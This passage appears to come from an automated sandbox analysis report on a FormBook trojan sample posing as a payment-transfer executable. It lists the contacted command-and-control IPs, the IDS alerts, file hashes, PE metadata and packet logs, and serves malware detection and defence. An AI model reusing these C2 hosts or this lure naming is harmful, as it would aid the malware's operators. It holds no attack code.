                                                            http://www.stanchilo.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs


                                                            Public

IP                Domain   Country         ASN    ASN Name                                      Malicious
210.152.86.132    unknown  Japan           4694   IDCFIDCFrontierIncJP                          true
198.52.105.123    unknown  United States   35916  MULTA-ASN1US                                  true
50.116.112.43     unknown  United States   46606  UNIFIEDLAYER-AS-1US                           true
176.74.27.137     unknown  United Kingdom  38719  DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU   true
35.246.6.109      unknown  United States   15169  GOOGLEUS                                      true
34.102.136.180    unknown  United States   15169  GOOGLEUS                                      true
185.199.108.153   unknown  Netherlands     54113  FASTLYUS                                      true
164.155.144.220   unknown  South Africa    26484  IKGUL-26484US                                 true
198.27.88.111     unknown  Canada          16276  OVHFR                                         true

                                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356535
Start date: 23.02.2021
Start time: 09:45:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@9/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 65.3% (good quality ratio 60%)
• Quality average: 71.9%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 92.122.145.220, 168.61.161.212, 184.30.20.56, 51.104.139.180, 104.42.151.234, 8.248.139.254, 8.248.131.254, 67.27.157.254, 67.27.157.126, 8.248.147.254, 20.54.26.129, 51.104.144.132, 92.122.213.247, 92.122.213.194, 52.155.217.156
                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                            Simulations

                                                            Behavior and APIs

Time      Type             Description
09:46:53  API Interceptor  1x Sleep call for process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs


                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                            ASN

                                                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log
                                                            Process: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            File Type: ASCII text, with CRLF line terminators
                                                            Category: dropped
                                                            Size (bytes): 1314
                                                            Entropy (8bit): 5.350128552078965
                                                            Encrypted: false
                                                            SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                            MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                            SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                            SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                            SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                            Malicious: true
                                                            Reputation: high, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                            Static File Info

                                                            General

                                                            File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit): 6.417043661042723
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            File size: 716288
                                                            MD5: 5f1c9c4a7bc24c3d39a5a3834ba7bb8e
                                                            SHA1: 0e9a21a75675c636438f50d90bb5f7ec9a689275
                                                            SHA256: 5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
                                                            SHA512: a85b3076ee72e71532e60d84e6827b6c83ddaa2b1f0b287fac373eff495f67600a4e8d47459c6253538f0d9d770c004f41833e75d630d12047442ed3a9033894
                                                            SSDEEP: 12288:IQ4DA80ZwvXdU9aLBdf3INYI1r1VJjRXRePHp:8DUZ22ODklZRYPHp
                                                            File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F4`..............P......H........... ........@.. .......................`............@................................

                                                            File Icon

                                                            Icon Hash: 020b05151c020900

                                                            Static PE Info

                                                            General

                                                            Entrypoint: 0x47c38a
                                                            Entrypoint Section: .text
                                                            Digitally signed: false
                                                            Imagebase: 0x400000
                                                            Subsystem: windows gui
                                                            Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp: 0x60344694 [Tue Feb 23 00:04:36 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version: v4.0.30319
                                                            OS Version Major: 4
                                                            OS Version Minor: 0
                                                            File Version Major: 4
                                                            File Version Minor: 0
                                                            Subsystem Version Major: 4
                                                            Subsystem Version Minor: 0
                                                            Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]

                                                            Data Directories

                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7c338 | 0x4f | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x344e8 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                            Sections

                                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x2000 | 0x7a390 | 0x7a400 | False | 0.763266471754 | data | 7.45974448722 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x7e000 | 0x344e8 | 0x34600 | False | 0.0788148866348 | data | 1.84613555516 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0xb4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            Name | RVA | Size | Type | Language | Country
                                                            RT_ICON | 0x7e130 | 0x33428 | dBase IV DBT, block length 6144, next free block index 40, next free block 4294967295, next used block 4294967295 | |
                                                            RT_GROUP_ICON | 0xb1558 | 0x14 | data | |
                                                            RT_VERSION | 0xb156c | 0x36c | data | |
                                                            RT_MANIFEST | 0xb18d8 | 0xc0f | XML 1.0 document, UTF-8 Unicode (with BOM) text | |

                                                            Imports

                                                            DLL | Import
                                                            mscoree.dll | _CorExeMain

                                                            Version Infos

                                                            Description | Data
                                                            Translation | 0x0000 0x04b0
                                                            LegalCopyright | Copyright 2018
                                                            Assembly Version | 1.0.0.0
                                                            InternalName | RegistryTimeZoneInformation.exe
                                                            FileVersion | 1.0.0.0
                                                            CompanyName |
                                                            LegalTrademarks |
                                                            Comments |
                                                            ProductName | RegisterVB
                                                            ProductVersion | 1.0.0.0
                                                            FileDescription | RegisterVB
                                                            OriginalFilename | RegistryTimeZoneInformation.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                            02/23/21-09:48:35.246251 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 50.116.112.43
                                                            02/23/21-09:48:35.246251 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 50.116.112.43
                                                            02/23/21-09:48:35.246251 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 50.116.112.43
                                                            02/23/21-09:48:54.032862 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.3 | 34.102.136.180
                                                            02/23/21-09:48:54.032862 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.3 | 34.102.136.180
                                                            02/23/21-09:48:54.032862 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.3 | 34.102.136.180
                                                            02/23/21-09:48:54.174190 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49739 | 34.102.136.180 | 192.168.2.3
                                                            02/23/21-09:49:37.345758 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.3 | 185.199.108.153
                                                            02/23/21-09:49:37.345758 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.3 | 185.199.108.153
                                                            02/23/21-09:49:37.345758 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.3 | 185.199.108.153
                                                            02/23/21-09:49:57.812186 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.3 | 176.74.27.137
                                                            02/23/21-09:49:57.812186 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.3 | 176.74.27.137
                                                            02/23/21-09:49:57.812186 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.3 | 176.74.27.137
                                                            02/23/21-09:50:39.257393 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49754 | 80 | 192.168.2.3 | 164.155.144.220
                                                            02/23/21-09:50:39.257393 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49754 | 80 | 192.168.2.3 | 164.155.144.220
                                                            02/23/21-09:50:39.257393 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49754 | 80 | 192.168.2.3 | 164.155.144.220

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 09:47:53.302598953 CET | 49726 | 80 | 192.168.2.3 | 35.246.6.109
Feb 23, 2021 09:47:53.366753101 CET | 80 | 49726 | 35.246.6.109 | 192.168.2.3
Feb 23, 2021 09:47:53.366893053 CET | 49726 | 80 | 192.168.2.3 | 35.246.6.109
Feb 23, 2021 09:47:53.367204905 CET | 49726 | 80 | 192.168.2.3 | 35.246.6.109
Feb 23, 2021 09:47:53.431372881 CET | 80 | 49726 | 35.246.6.109 | 192.168.2.3
Feb 23, 2021 09:47:53.479753971 CET | 80 | 49726 | 35.246.6.109 | 192.168.2.3
Feb 23, 2021 09:47:53.479780912 CET | 80 | 49726 | 35.246.6.109 | 192.168.2.3
Feb 23, 2021 09:47:53.479994059 CET | 49726 | 80 | 192.168.2.3 | 35.246.6.109
Feb 23, 2021 09:47:53.480159998 CET | 49726 | 80 | 192.168.2.3 | 35.246.6.109
Feb 23, 2021 09:47:53.544548988 CET | 80 | 49726 | 35.246.6.109 | 192.168.2.3
Feb 23, 2021 09:48:14.103236914 CET | 49735 | 80 | 192.168.2.3 | 210.152.86.132
Feb 23, 2021 09:48:14.399669886 CET | 80 | 49735 | 210.152.86.132 | 192.168.2.3
Feb 23, 2021 09:48:14.399941921 CET | 49735 | 80 | 192.168.2.3 | 210.152.86.132
Feb 23, 2021 09:48:14.400055885 CET | 49735 | 80 | 192.168.2.3 | 210.152.86.132
Feb 23, 2021 09:48:14.693931103 CET | 80 | 49735 | 210.152.86.132 | 192.168.2.3
Feb 23, 2021 09:48:14.694118977 CET | 80 | 49735 | 210.152.86.132 | 192.168.2.3
Feb 23, 2021 09:48:14.694143057 CET | 80 | 49735 | 210.152.86.132 | 192.168.2.3
Feb 23, 2021 09:48:14.694588900 CET | 49735 | 80 | 192.168.2.3 | 210.152.86.132
Feb 23, 2021 09:48:14.694619894 CET | 49735 | 80 | 192.168.2.3 | 210.152.86.132
Feb 23, 2021 09:48:14.987210035 CET | 80 | 49735 | 210.152.86.132 | 192.168.2.3
Feb 23, 2021 09:48:35.084038973 CET | 49736 | 80 | 192.168.2.3 | 50.116.112.43
Feb 23, 2021 09:48:35.245834112 CET | 80 | 49736 | 50.116.112.43 | 192.168.2.3
Feb 23, 2021 09:48:35.245968103 CET | 49736 | 80 | 192.168.2.3 | 50.116.112.43
Feb 23, 2021 09:48:35.246251106 CET | 49736 | 80 | 192.168.2.3 | 50.116.112.43
Feb 23, 2021 09:48:35.407773972 CET | 80 | 49736 | 50.116.112.43 | 192.168.2.3
Feb 23, 2021 09:48:35.756676912 CET | 49736 | 80 | 192.168.2.3 | 50.116.112.43
Feb 23, 2021 09:48:35.959105015 CET | 80 | 49736 | 50.116.112.43 | 192.168.2.3
Feb 23, 2021 09:48:36.268591881 CET | 80 | 49736 | 50.116.112.43 | 192.168.2.3
Feb 23, 2021 09:48:36.268627882 CET | 80 | 49736 | 50.116.112.43 | 192.168.2.3
Feb 23, 2021 09:48:36.268660069 CET | 49736 | 80 | 192.168.2.3 | 50.116.112.43
Feb 23, 2021 09:48:36.268686056 CET | 49736 | 80 | 192.168.2.3 | 50.116.112.43
Feb 23, 2021 09:48:53.989866972 CET | 49739 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:48:54.032433033 CET | 80 | 49739 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:48:54.032671928 CET | 49739 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:48:54.032861948 CET | 49739 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:48:54.075917006 CET | 80 | 49739 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:48:54.174190044 CET | 80 | 49739 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:48:54.174376011 CET | 80 | 49739 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:48:54.174551010 CET | 49739 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:48:54.174585104 CET | 49739 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:48:54.217343092 CET | 80 | 49739 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:48:54.217567921 CET | 80 | 49739 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:48:54.217709064 CET | 49739 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:49:16.426949024 CET | 49740 | 80 | 192.168.2.3 | 198.52.105.123
Feb 23, 2021 09:49:16.623905897 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.624052048 CET | 49740 | 80 | 192.168.2.3 | 198.52.105.123
Feb 23, 2021 09:49:16.624357939 CET | 49740 | 80 | 192.168.2.3 | 198.52.105.123
Feb 23, 2021 09:49:16.821913004 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.870922089 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.871021032 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.871046066 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.871067047 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.871087074 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.871104956 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:16.871181011 CET | 49740 | 80 | 192.168.2.3 | 198.52.105.123
Feb 23, 2021 09:49:16.871262074 CET | 49740 | 80 | 192.168.2.3 | 198.52.105.123
Feb 23, 2021 09:49:16.871350050 CET | 49740 | 80 | 192.168.2.3 | 198.52.105.123
Feb 23, 2021 09:49:17.068207026 CET | 80 | 49740 | 198.52.105.123 | 192.168.2.3
Feb 23, 2021 09:49:37.302115917 CET | 49748 | 80 | 192.168.2.3 | 185.199.108.153
Feb 23, 2021 09:49:37.345478058 CET | 80 | 49748 | 185.199.108.153 | 192.168.2.3
Feb 23, 2021 09:49:37.345629930 CET | 49748 | 80 | 192.168.2.3 | 185.199.108.153
Feb 23, 2021 09:49:37.345757961 CET | 49748 | 80 | 192.168.2.3 | 185.199.108.153
Feb 23, 2021 09:49:37.389106989 CET | 80 | 49748 | 185.199.108.153 | 192.168.2.3
Feb 23, 2021 09:49:37.472671032 CET | 80 | 49748 | 185.199.108.153 | 192.168.2.3
Feb 23, 2021 09:49:37.472696066 CET | 80 | 49748 | 185.199.108.153 | 192.168.2.3
Feb 23, 2021 09:49:37.472858906 CET | 49748 | 80 | 192.168.2.3 | 185.199.108.153
Feb 23, 2021 09:49:37.472898960 CET | 49748 | 80 | 192.168.2.3 | 185.199.108.153
Feb 23, 2021 09:49:37.517864943 CET | 80 | 49748 | 185.199.108.153 | 192.168.2.3
Feb 23, 2021 09:49:57.757414103 CET | 49752 | 80 | 192.168.2.3 | 176.74.27.137
Feb 23, 2021 09:49:57.811839104 CET | 80 | 49752 | 176.74.27.137 | 192.168.2.3
Feb 23, 2021 09:49:57.811960936 CET | 49752 | 80 | 192.168.2.3 | 176.74.27.137
Feb 23, 2021 09:49:57.812186003 CET | 49752 | 80 | 192.168.2.3 | 176.74.27.137
Feb 23, 2021 09:49:57.873881102 CET | 80 | 49752 | 176.74.27.137 | 192.168.2.3
Feb 23, 2021 09:49:57.874310970 CET | 49752 | 80 | 192.168.2.3 | 176.74.27.137
Feb 23, 2021 09:49:57.874418020 CET | 49752 | 80 | 192.168.2.3 | 176.74.27.137
Feb 23, 2021 09:49:57.927423954 CET | 80 | 49752 | 176.74.27.137 | 192.168.2.3
Feb 23, 2021 09:50:18.297434092 CET | 49753 | 80 | 192.168.2.3 | 198.27.88.111
Feb 23, 2021 09:50:18.431996107 CET | 80 | 49753 | 198.27.88.111 | 192.168.2.3
Feb 23, 2021 09:50:18.432109118 CET | 49753 | 80 | 192.168.2.3 | 198.27.88.111
Feb 23, 2021 09:50:18.432307005 CET | 49753 | 80 | 192.168.2.3 | 198.27.88.111
Feb 23, 2021 09:50:18.564835072 CET | 80 | 49753 | 198.27.88.111 | 192.168.2.3
Feb 23, 2021 09:50:18.584054947 CET | 80 | 49753 | 198.27.88.111 | 192.168.2.3
Feb 23, 2021 09:50:18.584095955 CET | 80 | 49753 | 198.27.88.111 | 192.168.2.3
Feb 23, 2021 09:50:18.584261894 CET | 49753 | 80 | 192.168.2.3 | 198.27.88.111
Feb 23, 2021 09:50:18.584335089 CET | 49753 | 80 | 192.168.2.3 | 198.27.88.111
Feb 23, 2021 09:50:18.716856003 CET | 80 | 49753 | 198.27.88.111 | 192.168.2.3
Feb 23, 2021 09:50:39.051729918 CET | 49754 | 80 | 192.168.2.3 | 164.155.144.220
Feb 23, 2021 09:50:39.257086039 CET | 80 | 49754 | 164.155.144.220 | 192.168.2.3
Feb 23, 2021 09:50:39.257184029 CET | 49754 | 80 | 192.168.2.3 | 164.155.144.220
Feb 23, 2021 09:50:39.257392883 CET | 49754 | 80 | 192.168.2.3 | 164.155.144.220
Feb 23, 2021 09:50:39.462497950 CET | 80 | 49754 | 164.155.144.220 | 192.168.2.3
Feb 23, 2021 09:50:39.465549946 CET | 80 | 49754 | 164.155.144.220 | 192.168.2.3
Feb 23, 2021 09:50:39.465570927 CET | 80 | 49754 | 164.155.144.220 | 192.168.2.3
Feb 23, 2021 09:50:39.465783119 CET | 49754 | 80 | 192.168.2.3 | 164.155.144.220
Feb 23, 2021 09:50:39.465820074 CET | 49754 | 80 | 192.168.2.3 | 164.155.144.220
Feb 23, 2021 09:50:39.672122002 CET | 80 | 49754 | 164.155.144.220 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 09:46:40.074162960 CET | 50200 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:40.133456945 CET | 53 | 50200 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:46:41.417691946 CET | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:41.478061914 CET | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:46:42.189471960 CET | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:42.240940094 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:46:43.301377058 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:43.360296011 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:46:43.439152002 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:43.501475096 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:46:44.661849976 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:44.722966909 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:46:46.038443089 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:46:46.086977959 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:07.327891111 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:07.379460096 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:08.573640108 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:08.622617006 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:09.539221048 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:09.602024078 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:10.147272110 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:10.196006060 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:11.667907000 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:11.791357994 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:13.019293070 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:13.067945004 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:23.525736094 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:23.574409962 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:24.983030081 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:25.031742096 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:26.150157928 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:26.199599028 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:26.326800108 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:26.375427961 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:27.303738117 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:27.355180025 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:29.276165009 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:29.338347912 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:31.661143064 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:31.711962938 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:32.979504108 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:33.036781073 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:34.842191935 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:34.890940905 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:50.242492914 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:47:50.308706999 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:47:53.216571093 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
